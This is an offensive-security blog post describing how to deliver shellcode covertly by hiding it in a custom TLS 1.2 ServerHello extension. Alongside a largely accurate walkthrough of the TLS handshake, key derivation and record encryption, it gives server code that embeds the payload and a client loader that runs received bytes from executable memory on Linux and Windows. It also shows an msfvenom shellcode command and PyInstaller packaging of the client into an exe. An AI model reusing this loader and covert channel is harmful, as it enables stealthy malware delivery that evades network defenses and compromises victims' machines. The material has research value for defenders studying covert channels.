Exotic ways of hiding shellcode. Part 2 : TLS

TLS is a trustworthy channel. Surely we can’t use it to distribute malware.

In this episode, we’ll be writing a custom TLS client and a server !

We will hide the shellcode in places the TLS RFC (RFC 5246) allows, extract the shellcode using our custom client and execute it.

And the best part ? We’ll be doing all of this while keeping the traffic fully legitimate and RFC-compliant !

This post is not about how to execute the shellcode while evading defenses; it’s about how to silently deliver it.

Motivation

So why bother writing a custom TLS client and server? Honestly, I thought this would be way easier when I first came up with the idea, but it turned out to be a lot more complicated than I expected. Crypto looks neat and clean in diagrams, but once you dig into the details things get chaotic fast.

I wanted to have my own TLS stack around for future work as well. Exploit development, fuzzing, or just messing with anything crypto/TLS related.

Protocols are usually built to be rock solid and reliable. Over time, they collect all sorts of extra features and little details that rarely see any use, and that’s perfectly normal. That’s why we’re still using SMB from 1983, SSH from 1995, and RDP from 1998. Their core architecture is strong enough that with just small tweaks and updates, they’ve managed to stay relevant for decades.

For example, let’s take a look at the Certificate Request message of TLS:

7.4.4.  Certificate Request

   When this message will be sent:

       A non-anonymous server can optionally request a certificate from
       the client, if appropriate for the selected cipher suite.  This
       message, if sent, will immediately follow the ServerKeyExchange
       message (if it is sent; otherwise, this message follows the
       server's Certificate message).

   Structure of this message:

      enum {
          rsa_sign(1), dss_sign(2), rsa_fixed_dh(3), dss_fixed_dh(4),
          rsa_ephemeral_dh_RESERVED(5), dss_ephemeral_dh_RESERVED(6),
          fortezza_dms_RESERVED(20), (255)
      } ClientCertificateType;

fortezza_dms_RESERVED ?? what is that ?

Turns out Fortezza is a U.S. government cryptographic system built around a hardware token, and SSL 3.0 shipped cipher suites for it. TLS 1.2 only keeps the identifier reserved.

It was developed for the U.S. government’s Clipper chip project and has been used by the U.S. Government in various applications

The most widely used Type 1 encryption card is the KOV-12 Fortezza card which is used extensively for the Defense Message System (DMS).

I had never heard of Fortezza DMS before, but it turns out people really used it, and its identifier still lingers in the TLS spec.

You’ll often bump into tons of legacy features or unused tech stack when exploring protocol internals.

Idea

The idea is very simple,

  • Find a place where you can hide your shellcode reliably without ever interrupting the TLS and the data flow.
  • Hide your shellcode in that very exact location.
  • Your server runs a TLS service that carries the shellcode.
  • Your client talks to your server while performing the TLS connection, receives the shellcode from the server and executes it.

Coolz, let’s get into it.

Writing a TLS Client & Server from scratch

I’ll be working with TLS 1.2 here. It’s close enough to the other TLS versions that the differences don’t really get in the way.

A generic TLS flow looks like the one below.

[Image: TLS 1.2 handshake flow diagram]

Let me try to explain it in detail. I will use TLS_RSA_WITH_AES_128_CBC_SHA256 for this very specific blogpost.

  • Client starts keeping a record of every handshake message (they are needed later for Finished).
  • Client and server first greet each other with Hello messages. Client sends Client Hello and shares the following with the server
    • TLS version
    • Timestamp (the RFC says the first 4 bytes should be a timestamp, but no one really cares about this field; clients ignore it and just generate a 32-byte random value)
    • Random values
    • Available cipher suites
    • Available compression methods
    • Extensions
    • Available signature algorithms
  • Server sends Server Hello back and shares
    • Timestamp
    • Random values it just generated
    • Agreed cipher suite to be used
    • Agreed compression method
    • Extensions
  • Server sends the server Certificate to client and sends a Server Hello Done message.
  • Client sends a Client Key Exchange message to server where it,
    • Parses the server certificate, finds server’s public key.
    • Based on the agreed cipher suite (which the server picks), generates the pre-master secret.
    • Encrypts the pre-master secret with the server’s public key (the server can decrypt it with its private key)
  • Client sends Change Cipher Spec message (this is not a handshake message; it is another record type, 20)
  • Server and Client expand keys. Meaning,
    • They calculate the master secret using the pseudo_random_function that the TLS RFC defines
    • They expand the master secret into a key block and derive keys
      • master_secret
      • client_write_MAC_key
      • server_write_MAC_key
      • client_write_key
      • server_write_key
      • client_write_IV
      • server_write_IV
    • They’ll use those keys to encrypt and decrypt data.
  • Client sends Finished,
    • Client concatenates every handshake message, both sent and received, and hashes the result with the hash function of the agreed cipher suite.
      • Ex: handshake_hash = sha256(handshake_messages)
    • With the master secret and agreed cipher method it generates a verify_data of length 12
    • Encrypts this message itself and sends it.
      • Encryption mechanism is the agreed cipher suite.
  • Server receives Finished,
    • Decrypts Finished
    • Verifies that the verify_data client has calculated is correct. Meaning that the TLS is done correctly and there are no problems
    • Replies with server Finished.
  • Client and server can now start exchanging data over the secure channel
    • WRITE_SEQ and READ_SEQ are set to zero
      • On each read (receive) or write (send) they increment this value.
  • Client sends an Application Data,
    • Basically sends a plain text by encrypting it using the derived keys
  • Server receives the Application Data,
    • Decrypts it and it does whatever it does
  • Either one can send Alert whenever something wrong happens independent of the order

Let’s write it !

TLS Record Layer

In TLS, every message is carried inside the record layer. As you can see below, there are 4 record types. We’ll be using the Handshake messages (plus a single ChangeCipherSpec) to set up the secure channel, and then we’ll exchange data through Application Data records. The Alert record doesn’t follow the normal order and can be sent at any time.

struct {
          uint8 major;
          uint8 minor;
      } ProtocolVersion;

enum {
  change_cipher_spec(20), alert(21), handshake(22),
  application_data(23), (255)
} ContentType;

struct {
  ContentType type;
  ProtocolVersion version;
  uint16 length;
  opaque fragment[TLSPlaintext.length];
} TLSPlaintext;
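
As a rough illustration of the TLSPlaintext structure above, here is a minimal sketch that packs and parses the 5-byte record header. The helper names `build_record` and `parse_record` are made up for this example and are not taken from the PoC repo.

```python
import struct

# ContentType values from the RFC 5246 enum above
CONTENT_TYPES = {
    20: "change_cipher_spec",
    21: "alert",
    22: "handshake",
    23: "application_data",
}
TLS_1_2 = (3, 3)  # ProtocolVersion {major, minor} for TLS 1.2


def build_record(content_type: int, fragment: bytes, version=TLS_1_2) -> bytes:
    """Prefix a fragment with type (1 byte), version (2 bytes) and length (2 bytes)."""
    if len(fragment) > 2 ** 14:
        raise ValueError("a TLSPlaintext fragment must not exceed 2^14 bytes")
    header = struct.pack("!BBBH", content_type, version[0], version[1], len(fragment))
    return header + fragment


def parse_record(data: bytes):
    """Return (type name, version, fragment, remaining bytes) for the first record."""
    if len(data) < 5:
        raise ValueError("need at least 5 bytes for a record header")
    content_type, major, minor, length = struct.unpack("!BBBH", data[:5])
    fragment = data[5:5 + length]
    if len(fragment) != length:
        raise ValueError("truncated record")
    name = CONTENT_TYPES.get(content_type, "unknown")
    return name, (major, minor), fragment, data[5 + length:]
```

Wrapping an empty ServerHelloDone handshake message (type 14, length 0) this way gives a 9-byte record that starts with 0x16 0x03 0x03.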

Client Hello

Client Hello and the following messages are handshake messages.

The ClientHello message includes a random structure, which is used later in the protocol.

    struct {
     uint32 gmt_unix_time;
     opaque random_bytes[28];
    } Random;

I found this funny because clients don’t really care about the 4-byte timestamp gmt_unix_time. They just ignore it and generate a 32-byte random value instead.

struct {
  ProtocolVersion client_version;
  Random random;
  SessionID session_id;
  CipherSuite cipher_suites<2..2^16-2>;
  CompressionMethod compression_methods<1..2^8-1>;
  select (extensions_present) {
      case false:
          struct {};
      case true:
          Extension extensions<0..2^16-1>;
  };
} ClientHello;
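
To make the ClientHello layout more concrete, here is a minimal sketch that serializes one as a handshake message. It assumes a single cipher suite (TLS_RSA_WITH_AES_128_CBC_SHA256, 0x003C), an empty session ID and null compression; `build_client_hello` is a hypothetical helper, and a real server may expect more extensions than this sketch sends.

```python
import os

HANDSHAKE_CLIENT_HELLO = 1                        # HandshakeType client_hello
TLS_RSA_WITH_AES_128_CBC_SHA256 = b"\x00\x3c"     # the suite used in this post


def build_client_hello(extensions: bytes = b"") -> bytes:
    """Serialize a ClientHello wrapped in its 4-byte handshake header.

    `extensions` is the already-encoded list of extensions, without the
    2-byte total length (this function adds it when the list is not empty).
    """
    client_version = b"\x03\x03"                  # TLS 1.2
    random = os.urandom(32)                       # 32 random bytes, timestamp ignored
    session_id = b""                              # no session to resume
    cipher_suites = TLS_RSA_WITH_AES_128_CBC_SHA256
    compression_methods = b"\x00"                 # null compression only

    body = (
        client_version
        + random
        + len(session_id).to_bytes(1, "big") + session_id
        + len(cipher_suites).to_bytes(2, "big") + cipher_suites
        + len(compression_methods).to_bytes(1, "big") + compression_methods
    )
    if extensions:
        body += len(extensions).to_bytes(2, "big") + extensions

    # Handshake header: msg_type (1 byte) + length (3 bytes)
    return bytes([HANDSHAKE_CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
```

Passing `b"\xbe\xef\x00\x00"` as `extensions` would offer an extension of type 0xBEEF with empty extension_data.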

Server Hello

struct {
          ProtocolVersion server_version;
          Random random;
          SessionID session_id;
          CipherSuite cipher_suite;
          CompressionMethod compression_method;
          select (extensions_present) {
              case false:
                  struct {};
              case true:
                  Extension extensions<0..2^16-1>;
          };
      } ServerHello;

The server picks one of the cipher suites the client offered and uses it.

 cipher_suite
      The single cipher suite selected by the server from the list in
      ClientHello.cipher_suites.  For resumed sessions, this field is
      the value from the state of the session being resumed.

Certificate

opaque ASN.1Cert<1..2^24-1>;

struct {
  ASN.1Cert certificate_list<0..2^24-1>;
} Certificate;

-  The certificate type MUST be X.509v3, unless explicitly negotiated
      otherwise (e.g., [TLSPGP]).

Server Hello Done

Hello done has no fields.

struct { } ServerHelloDone;

Pseudo Random Function

PRF logic is as follows,

PRF(secret, label, seed) = P_<hash>(secret, label + seed)

where P_hash is,

      P_hash(secret, seed) = HMAC_hash(secret, A(1) + seed) +
                             HMAC_hash(secret, A(2) + seed) +
                             HMAC_hash(secret, A(3) + seed) + ...

I found the documentation slightly confusing because it says little about which hash function to use here. For the cipher suites defined in RFC 5246, including ours, it is SHA-256.

The code block I’ve written is cleaner for me to read,

import hashlib
import hmac


def pseudo_random_function(secret: bytes, label: bytes, seed: bytes, output_length: int, hash_function=hashlib.sha256) -> bytes:
    """
    section 5 of rfc 5246
    https://datatracker.ietf.org/doc/html/rfc5246#section-5

    TLS 1.2 PRF(secret, label, seed) = P_hash(secret, label + seed)
    """
    full_seed = label + seed
    return p_hash(secret, full_seed, output_length, hash_function)


def p_hash(secret: bytes, seed: bytes, output_length: int, hash_function) -> bytes:
    """
    P_hash(secret, seed) = HMAC_hash(secret, A(1) + seed) +
                           HMAC_hash(secret, A(2) + seed) + ...
    where:
      A(0) = seed
      A(i) = HMAC_hash(secret, A(i-1))
    """
    result = bytearray()
    A = seed
    while len(result) < output_length:
        A = hmac.new(secret, A, hash_function).digest()
        result.extend(hmac.new(secret, A + seed, hash_function).digest())
    return bytes(result[:output_length])

Client Key Exchange

struct {
    select (KeyExchangeAlgorithm) {
        case rsa:
            EncryptedPreMasterSecret;
        case dhe_dss:
        case dhe_rsa:
        case dh_dss:
        case dh_rsa:
        case dh_anon:
            ClientDiffieHellmanPublic;
    } exchange_keys;
} ClientKeyExchange;

RSA-Encrypted Premaster Secret Message,

  If RSA is being used for key agreement and authentication, the
 client generates a 48-byte premaster secret, encrypts it using the
 public key from the server's certificate, and sends the result in
 an encrypted premaster secret message.  This structure is a
 variant of the ClientKeyExchange message and is not a message in
 itself.

Structure of this message:

struct {
    ProtocolVersion client_version;
    opaque random[46];
} PreMasterSecret;

client_version
    The latest (newest) version supported by the client.  This is
    used to detect version rollback attacks.

random
    46 securely-generated random bytes.

struct {
    public-key-encrypted PreMasterSecret pre_master_secret;
} EncryptedPreMasterSecret;

pre_master_secret
    This random value is generated by the client and is used to
    generate the master secret, as specified in Section 8.1.

Key Expansion

This one is not a handshake message.

The pre-master secret was established in the last message, Client Key Exchange. In order to encrypt and decrypt messages, it must be turned into a master secret, which is then expanded to derive the other keys.

We start by calculating master_secret first,

master_secret = PRF(pre_master_secret, "master secret",
                    ClientHello.random + ServerHello.random)
                    [0..47];

We expand the master secret into a key block with the label "key expansion",

key_block = PRF(SecurityParameters.master_secret,
              "key expansion",
              SecurityParameters.server_random +
              SecurityParameters.client_random);

and then the block is partitioned,

        client_write_MAC_key[SecurityParameters.mac_key_length]
        server_write_MAC_key[SecurityParameters.mac_key_length]
        client_write_key[SecurityParameters.enc_key_length]
        server_write_key[SecurityParameters.enc_key_length]
        client_write_IV[SecurityParameters.fixed_iv_length]
        server_write_IV[SecurityParameters.fixed_iv_length]
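
Put together, the derivation and partitioning could look like the sketch below. The default sizes are an assumption for TLS_RSA_WITH_AES_128_CBC_SHA256 (32-byte MAC keys, 16-byte AES keys) plus 16-byte IVs to mirror the key names used in this post; `derive_master_secret` and `derive_keys` are hypothetical helper names.

```python
import hashlib
import hmac


def p_hash(secret: bytes, seed: bytes, length: int, hash_function=hashlib.sha256) -> bytes:
    """P_hash from RFC 5246 section 5, truncated to `length` bytes."""
    result = bytearray()
    a = seed                                            # A(0) = seed
    while len(result) < length:
        a = hmac.new(secret, a, hash_function).digest() # A(i) = HMAC(secret, A(i-1))
        result.extend(hmac.new(secret, a + seed, hash_function).digest())
    return bytes(result[:length])


def prf(secret: bytes, label: bytes, seed: bytes, length: int) -> bytes:
    return p_hash(secret, label + seed, length)


def derive_master_secret(pre_master_secret: bytes, client_random: bytes, server_random: bytes) -> bytes:
    # Note the order: client random first
    return prf(pre_master_secret, b"master secret", client_random + server_random, 48)


def derive_keys(master_secret: bytes, client_random: bytes, server_random: bytes,
                mac_key_length: int = 32, enc_key_length: int = 16, iv_length: int = 16) -> dict:
    """Expand the master secret and slice the key block in RFC order."""
    layout = [
        ("client_write_MAC_key", mac_key_length),
        ("server_write_MAC_key", mac_key_length),
        ("client_write_key", enc_key_length),
        ("server_write_key", enc_key_length),
        ("client_write_IV", iv_length),
        ("server_write_IV", iv_length),
    ]
    total = sum(size for _, size in layout)
    # Note the order: server random first this time
    key_block = prf(master_secret, b"key expansion", server_random + client_random, total)
    keys, offset = {}, 0
    for name, size in layout:
        keys[name] = key_block[offset:offset + size]
        offset += size
    return keys
```

The detail that is easiest to get wrong is the seed order: client random first for the master secret, server random first for the key block. Since the IVs sit at the end of the block, changing `iv_length` does not affect the MAC and encryption keys.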

Change Cipher Spec

This is not a handshake message. It is a separate TLS record type of its own.

struct {
   enum { change_cipher_spec(1), (255) } type;
} ChangeCipherSpec;

Client Finished

struct {
    opaque verify_data[verify_data_length];
} Finished;

The label differs based on the direction. The client uses "client finished" and the server uses "server finished" (with a space, not an underscore).

verify_data
         PRF(master_secret, finished_label, Hash(handshake_messages))
            [0..verify_data_length-1];

handshake_messages is important here. You must concatenate every handshake message, without the record layer headers.

handshake_messages
    All of the data from all messages in this handshake (not
    including any HelloRequest messages) up to, but not including,
    this message.  This is only data visible at the handshake layer
    and does not include record layer headers.  This is the
    concatenation of all the Handshake structures as defined in
    Section 7.4, exchanged thus far.
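
A minimal sketch of the verify_data computation, assuming SHA-256 as the handshake hash and the default verify_data_length of 12. `compute_verify_data` is a hypothetical helper, and `handshake_messages` is assumed to be a list of raw handshake messages (4-byte handshake header included, record header excluded) in the order they were sent and received.

```python
import hashlib
import hmac


def p_hash(secret: bytes, seed: bytes, length: int, hash_function=hashlib.sha256) -> bytes:
    """P_hash from RFC 5246 section 5, truncated to `length` bytes."""
    result = bytearray()
    a = seed
    while len(result) < length:
        a = hmac.new(secret, a, hash_function).digest()
        result.extend(hmac.new(secret, a + seed, hash_function).digest())
    return bytes(result[:length])


def compute_verify_data(master_secret: bytes, handshake_messages: list, from_client: bool) -> bytes:
    """PRF(master_secret, finished_label, Hash(handshake_messages))[0..11]."""
    label = b"client finished" if from_client else b"server finished"
    transcript_hash = hashlib.sha256(b"".join(handshake_messages)).digest()
    return p_hash(master_secret, label + transcript_hash, 12)


def build_finished(verify_data: bytes) -> bytes:
    """Finished handshake message: type 20, 3-byte length, verify_data."""
    return b"\x14" + len(verify_data).to_bytes(3, "big") + verify_data
```

When the server side is computed, the list should also contain the client's Finished message, since that one is part of the handshake by then.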

Encryption Mechanism

We are using TLS_RSA_WITH_AES_128_CBC_SHA256, so in our case records are encrypted with AES-128 in CBC mode and authenticated with HMAC-SHA256.

Finished message itself is encrypted.

Before sending anything encrypted, we must initialize the READ (receive) and WRITE (send) sequence counters in our logic.

ctx.WRITE_SEQ = 0
ctx.READ_SEQ = 0

The sequence number starts at 0 for the first record sent under the new keys, which is the client Finished. We use the current value for the MAC and increment WRITE_SEQ only after that, and we do the same for every record that follows.

We grab the keys that we’ve derived earlier,

key = self.ctx.KEYS['client_write_key']
iv =  self.ctx.KEYS['client_write_IV']
mac_key = self.ctx.KEYS['client_write_MAC_key']

Grab the seq number.

# use the current sequence number, then advance it for the next record
seq_num_raw = self.ctx.WRITE_SEQ.to_bytes(8, 'big')
self.ctx.WRITE_SEQ += 1

Compute mac, pad data and encrypt it.

mac_data = (
    seq_num_raw +
    self.msg_type +
    self.ctx.TLS_VERSION_1_2 +
    len(data).to_bytes(2, 'big') +
    data
)

mac = hmac.new(mac_key, mac_data, hashlib.sha256).digest()

# mac
plaintext = data + mac

# padding 
block_size = AES.block_size
pad_len = block_size - ((len(plaintext) + 1) % block_size)
padding = bytes([pad_len] * (pad_len + 1))  # pad_len + 1 bytes
plaintext += padding

# AES encrypt - CBC
cipher = AES.new(key, AES.MODE_CBC, iv)
ciphertext = cipher.encrypt(plaintext)

# prepend the IV: TLS 1.2 CBC records carry an explicit IV, which the RFC expects to be random per record
full_msg = iv + ciphertext
return full_msg
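
The receiving side has to undo these steps after the AES-CBC decryption. Below is a stdlib-only sketch of the MAC and padding logic, with the AES step itself left out; the function names are made up for this example, and a production implementation would also need to handle padding and MAC failures in constant time.

```python
import hashlib
import hmac

BLOCK_SIZE = 16   # AES block size
MAC_LENGTH = 32   # HMAC-SHA256 output size


def record_mac(mac_key: bytes, seq_num: int, content_type: int, version: bytes, fragment: bytes) -> bytes:
    """HMAC over seq_num + type + version + length + fragment."""
    header = (
        seq_num.to_bytes(8, "big")
        + bytes([content_type])
        + version
        + len(fragment).to_bytes(2, "big")
    )
    return hmac.new(mac_key, header + fragment, hashlib.sha256).digest()


def add_padding(data: bytes) -> bytes:
    """Append pad_len + 1 bytes, each holding the value pad_len."""
    pad_len = (BLOCK_SIZE - (len(data) + 1) % BLOCK_SIZE) % BLOCK_SIZE
    return data + bytes([pad_len]) * (pad_len + 1)


def strip_padding(data: bytes) -> bytes:
    """Check and remove the padding added by add_padding."""
    pad_len = data[-1]
    if pad_len + 1 > len(data) or data[-(pad_len + 1):] != bytes([pad_len]) * (pad_len + 1):
        raise ValueError("bad padding")
    return data[:-(pad_len + 1)]


def open_plaintext(mac_key: bytes, seq_num: int, content_type: int, version: bytes, decrypted: bytes) -> bytes:
    """Take the CBC-decrypted bytes (IV already removed) and return the fragment."""
    unpadded = strip_padding(decrypted)
    fragment, mac = unpadded[:-MAC_LENGTH], unpadded[-MAC_LENGTH:]
    expected = record_mac(mac_key, seq_num, content_type, version, fragment)
    if not hmac.compare_digest(mac, expected):
        raise ValueError("bad_record_mac")
    return fragment
```

Because the sequence number is part of the MAC input, a record checked against the wrong READ_SEQ fails with bad_record_mac even when the keys are correct.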

Server Finished

Server Finished mirrors Client Finished. The label changes, and the hashed handshake_messages now also include the client’s Finished message.

Instead of "client finished", the server uses "server finished".

Application Data

Sending application data is quite straightforward. We just build a record with a different content type. The data is encrypted based on the agreed cipher suite, as shown above.

Alert

Alert is a separate record type of its own. There are predefined alert types,

enum { warning(1), fatal(2), (255) } AlertLevel;

enum {
    close_notify(0),
    unexpected_message(10),
    bad_record_mac(20),
    decryption_failed_RESERVED(21),
    record_overflow(22),
    decompression_failure(30),
    handshake_failure(40),
    no_certificate_RESERVED(41),
    bad_certificate(42),
    unsupported_certificate(43),
    certificate_revoked(44),
    certificate_expired(45),
    certificate_unknown(46),
    illegal_parameter(47),
    unknown_ca(48),
    access_denied(49),
    decode_error(50),
    decrypt_error(51),
    export_restriction_RESERVED(60),
    protocol_version(70),
    insufficient_security(71),
    internal_error(80),
    user_canceled(90),
    no_renegotiation(100),
    unsupported_extension(110),
    (255)
} AlertDescription;

struct {
    AlertLevel level;
    AlertDescription description;
} Alert;

For example, the alert below is a warning-level insufficient_security (0x47 is 71 in decimal):

bytes([0x01, 0x47])

Let’s keep it in mind for funz.
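
Decoding such a two-byte alert is a simple lookup. Here is a small sketch with only a subset of the descriptions from the enum above; `parse_alert` is a hypothetical helper.

```python
ALERT_LEVELS = {1: "warning", 2: "fatal"}

# Subset of the AlertDescription enum, enough for this example
ALERT_DESCRIPTIONS = {
    0: "close_notify",
    10: "unexpected_message",
    20: "bad_record_mac",
    40: "handshake_failure",
    47: "illegal_parameter",
    50: "decode_error",
    51: "decrypt_error",
    70: "protocol_version",
    71: "insufficient_security",
    80: "internal_error",
    110: "unsupported_extension",
}


def parse_alert(fragment: bytes):
    """Decode a 2-byte Alert fragment into (level, description) names."""
    if len(fragment) != 2:
        raise ValueError("an Alert is exactly 2 bytes: level and description")
    level, description = fragment
    return (
        ALERT_LEVELS.get(level, f"unknown({level})"),
        ALERT_DESCRIPTIONS.get(description, f"unknown({description})"),
    )
```

Once the connection is encrypted, alerts are protected like any other record, so this applies to the decrypted fragment.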

Extensions

This is the section where we’ll get creative.

From the RFC

7.4.1.4.  Hello Extensions

   The extension format is:

      struct {
          ExtensionType extension_type;
          opaque extension_data<0..2^16-1>;
      } Extension;

      enum {
          signature_algorithms(13), (65535)
      } ExtensionType;

   Here:

   -  "extension_type" identifies the particular extension type.

   -  "extension_data" contains information specific to the particular
      extension type.

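extension_data can hold up to 2^16-1 bytes, which is about 64 KB (slightly less in practice, since the whole extensions list is capped at 2^16-1 bytes as well). That is more than enough space for our shellcode.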

We also need to pay attention to this,

   An extension type MUST NOT appear in the ServerHello unless the same
   extension type appeared in the corresponding ClientHello.  If a
   client receives an extension type in ServerHello that it did not
   request in the associated ClientHello, it MUST abort the handshake
   with an unsupported_extension fatal alert.

   Nonetheless, "server-oriented" extensions may be provided in the
   future within this framework.  Such an extension (say, of type x)
   would require the client to first send an extension of type x in a
   ClientHello with empty extension_data to indicate that it supports
   the extension type.  In this case, the client is offering the
   capability to understand the extension type, and the server is taking
   the client up on its offer.

To stay 100% RFC-compliant, our client must first offer the extension in its Client Hello with empty extension_data.

Our extension type will be 0xBEEF and its extension_data will be our shellcode !

If the server is started with a shellcode, it appends the custom extension to our Server Hello message.

def generate_server_hello(self):
...
    # Extensions: include secure renegotiation (RFC5746) so modern clients don't abort
    # renegotiation_info (0xff01) with zero-length renegotiated_connection for initial handshake
    reneg_ext = b"\xff\x01" + (1).to_bytes(2, 'big') + b"\x00"
    extensions = reneg_ext

    if self.ctx.SHELLCODE:
        # if shellcode is set, add custom extension
        extension_type = b"\xBE\xEF" # BEEF
        extension_data = self.ctx.SHELLCODE # placeholder
        extension_data_len = len(extension_data).to_bytes(2, 'big')
        extensions += extension_type + extension_data_len + extension_data

    extensions_len = len(extensions).to_bytes(2, 'big')

    msg = (
        version +
        random_bytes +
        session_id_len + session_id +
        self.ctx.AGGREED_CIPHER_SUITE +
        compression +
        extensions_len + extensions
    )
    length = len(msg).to_bytes(3, 'big')
    server_hello = handshake_type + length + msg
    return self.generate_tls_record(server_hello)
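
On the wire, the extensions block is just a 2-byte total length followed by type/length/data triples. The sketch below encodes and parses such a block and checks the RFC rule quoted earlier (the server may only answer with extension types the client offered). All helper names are made up for this example, and the extension data is treated as opaque bytes.

```python
def encode_extension(ext_type: int, data: bytes = b"") -> bytes:
    """extension_type (2 bytes) + length (2 bytes) + extension_data."""
    if len(data) > 0xFFFF:
        raise ValueError("extension_data is limited to 2^16-1 bytes")
    return ext_type.to_bytes(2, "big") + len(data).to_bytes(2, "big") + data


def encode_extensions(extensions) -> bytes:
    """Concatenate (type, data) pairs and prefix the 2-byte total length."""
    body = b"".join(encode_extension(t, d) for t, d in extensions)
    if len(body) > 0xFFFF:
        raise ValueError("the extensions list is limited to 2^16-1 bytes")
    return len(body).to_bytes(2, "big") + body


def parse_extensions(block: bytes) -> dict:
    """Parse a length-prefixed extensions block into {type: data}."""
    if len(block) < 2:
        raise ValueError("missing extensions length")
    total = int.from_bytes(block[:2], "big")
    body = block[2:2 + total]
    if len(body) != total:
        raise ValueError("truncated extensions block")
    parsed, offset = {}, 0
    while offset < total:
        if offset + 4 > total:
            raise ValueError("truncated extension header")
        ext_type = int.from_bytes(body[offset:offset + 2], "big")
        length = int.from_bytes(body[offset + 2:offset + 4], "big")
        data = body[offset + 4:offset + 4 + length]
        if len(data) != length:
            raise ValueError("truncated extension_data")
        parsed[ext_type] = data
        offset += 4 + length
    return parsed


def unsolicited_extensions(offered_types, server_extensions: dict) -> list:
    """Types the server sent without the client offering them (should be empty)."""
    return sorted(t for t in server_extensions if t not in offered_types)
```

A compliant client would abort with a fatal unsupported_extension alert whenever `unsolicited_extensions` returns anything, which is why the custom type has to be offered in the Client Hello first.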

PoC

Without going into too much detail: you can find the complete PoC code in my GitHub repo,

morph3/my-tls

/mnt/c/Users/melih/Desktop/my-tls main*
venv ❯ python3 client.py localhost 8443
...

HTTP/1.0 200 ok
Content-type: text/html

<HTML><BODY BGCOLOR="#ffffff">
<pre>

s_server -cert server.crt -key server.key -accept 8443 -www -msg -tls1_2 -state -debug -trace
Secure Renegotiation IS NOT supported
Ciphers supported in s_server binary
TLSv1.3    :TLS_AES_256_GCM_SHA384    TLSv1.3    :TLS_CHACHA20_POLY1305_SHA256
TLSv1.3    :TLS_AES_128_GCM_SHA256    TLSv1.2    :ECDHE-ECDSA-AES256-GCM-SHA384
TLSv1.2    :ECDHE-RSA-AES256-GCM-SHA384 TLSv1.2    :DHE-RSA-AES256-GCM-SHA384
TLSv1.2    :ECDHE-ECDSA-CHACHA20-POLY1305 TLSv1.2    :ECDHE-RSA-CHACHA20-POLY1305
TLSv1.2    :DHE-RSA-CHACHA20-POLY1305 TLSv1.2    :ECDHE-ECDSA-AES128-GCM-SHA256
TLSv1.2    :ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2    :DHE-RSA-AES128-GCM-SHA256
TLSv1.2    :ECDHE-ECDSA-AES256-SHA384 TLSv1.2    :ECDHE-RSA-AES256-SHA384
TLSv1.2    :DHE-RSA-AES256-SHA256     TLSv1.2    :ECDHE-ECDSA-AES128-SHA256
TLSv1.2    :ECDHE-RSA-AES128-SHA256   TLSv1.2    :DHE-RSA-AES128-SHA256
TLSv1.0    :ECDHE-ECDSA-AES256-SHA    TLSv1.0    :ECDHE-RSA-AES256-SHA
SSLv3      :DHE-RSA-AES256-SHA        TLSv1.0    :ECDHE-ECDSA-AES128-SHA
...

Magic function,

def do_magic(ctx):
    import ctypes
    print("Doing the magic 😈")
    shellcode = bytes.fromhex(ctx.SHELLCODE.hex())
    print(f"Shellcode: {shellcode.hex()[:10]}...")
    if os.name == "posix":
        # if client is linux
        import mmap
        # Allocate RWX memory
        mem = mmap.mmap(-1, len(shellcode),
                        flags=mmap.MAP_PRIVATE | mmap.MAP_ANON,
                        prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
        # Copy shellcode into allocated memory
        mem.write(shellcode)
        # Cast memory to a function pointer
        func = ctypes.CFUNCTYPE(None)(ctypes.addressof(ctypes.c_void_p.from_buffer(mem)))
        # Call it
        func()
    else:
        # it is windows
        # extremely straight forward shellcode execution mechanism
        ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
        rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x3000, 0x40)
        ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode))
        handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
        ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
    return

As you may notice, the Windows block above is EXTREMELY suspicious, so it’s no surprise that 12 out of 72 engines flagged it. That’s not really the point, though: this post is about how to silently deliver the shellcode. The loader mechanism can vary a lot depending on your stack and how you design your workflow.

[Image: scan result showing 12 of 72 detections]

We can generate our shellcode using,

msfvenom -p windows/x64/exec CMD="cmd /c whoami & calc.exe" EXITFUNC=thread > shellcode.bin

Make sure to have EXITFUNC to not make the main logic crash.

And pack an exe like below,

python -m PyInstaller --onefile client.py

And enjoy !

image

This post is licensed under CC BY 4.0 by the author.